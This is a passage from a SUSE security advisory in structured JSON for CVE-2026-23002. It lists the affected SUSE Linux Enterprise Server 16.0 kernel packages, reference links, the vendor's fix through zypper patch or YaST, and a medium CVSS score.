fstest for the\nbuildid code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23002",
"url": "https://www.suse.com/security/cve/CVE-2026-23002"
},
{
"category": "external",
"summary": "SUSE Bug 1257243 for CVE-2026-23002",
"url": "https://bugzilla.suse.com/1257243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
